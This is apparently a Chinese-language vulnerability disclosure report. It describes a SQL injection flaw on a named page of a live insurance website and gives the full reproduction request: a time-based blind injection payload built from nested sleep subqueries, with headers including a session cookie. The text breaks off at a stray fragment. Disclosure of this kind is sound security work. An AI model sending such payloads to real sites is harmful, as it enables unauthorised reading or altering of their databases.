当用户可控的数据未经过恰当的处理就进入了数据库执行的SQL语句中时,就可能存在SQL注入漏洞。攻击者可以定制特定的字符来改变SQL语句的语义。通过SQL注入漏洞可以造成多种危害,包括读取或者修改应用的数据,改变程序逻辑,提升权限和执行操作系统命令等。
1、漏洞触发页面以及对应功能:
~~
www.tpre.cntaiping.com/index.php/Home/Show/index/cid/20/id/
2、漏洞复现具体流程,包含具体payload和完整的数据包:
GET /index.php/Home/Show/index/cid/20/id/(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: www.tpre.cntaiping.com
Cookie: PHPSESSID=rko1m2novndqh69v8fau0uusv4; lang=zh_hk
Host: www.tpre.cntaiping.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
2,</